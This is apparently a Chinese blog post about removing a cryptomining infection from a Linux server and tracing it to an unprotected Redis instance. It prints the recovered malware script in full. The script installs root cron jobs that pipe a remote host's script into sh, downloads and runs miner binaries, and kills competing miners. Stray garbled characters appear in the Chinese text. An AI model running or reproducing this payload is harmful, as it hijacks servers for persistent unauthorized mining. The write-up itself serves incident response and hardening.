1. 用 top 命令查看哪些進程耗費資源镣屹;發(fā)現(xiàn)兩個異常進程
Paste_Image.png
2. ps -ef 查看進程源文件
Paste_Image.png
3.關閉進程, 找到源文件;刪除
Paste_Image.png
4.最后發(fā)現(xiàn)一個遠程的病毒腳本
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/5 * * * * curl -fsSL http://104.131.145.109/i.sh?7 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://104.131.145.109/i.sh?7 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddg.1001" ]; then
curl -fsSL http://104.131.145.109/1001/ddg.$(uname -m) -o /tmp/ddg.1001
fi
chmod +x /tmp/ddg.1001 && /tmp/ddg.1001
CleanTail()
{
ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
}
DoTKY()
{
if [ ! -f "/tmp/wnTKYg" ]; then
curl -fsSL http://104.131.145.109/wnTKYg -o /tmp/wnTKYg
fi
chmod +x /tmp/wnTKYg
/tmp/wnTKYg
}
DoTKYnoAES()
{
if [ ! -f "/tmp/wnTKYg.noaes" ]; then
curl -fsSL http://104.131.145.109/wnTKYg.noaes -o /tmp/wnTKYg.noaes
fi
chmod +x /tmp/wnTKYg.noaes
/tmp/wnTKYg.noaes
}
ps auxf|grep -v grep|grep "AnXqV"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wnTKYg" || DoTKY
ps auxf|grep -v grep|grep "wnTKYg" || DoTKYnoAES
5. 事故原因
網(wǎng)上搜索后得知是 redis 的一個漏洞,主要利用 redis 安裝后沒有設置密碼和限制登錄來源才漆,使用
redis-cli -h IP 就可以直接遠程登錄 redis
6. 解決方法
1. 設置 redis 密碼
2. 限制遠程登錄的來源 IP
3. 不使用 root 用戶運行 redis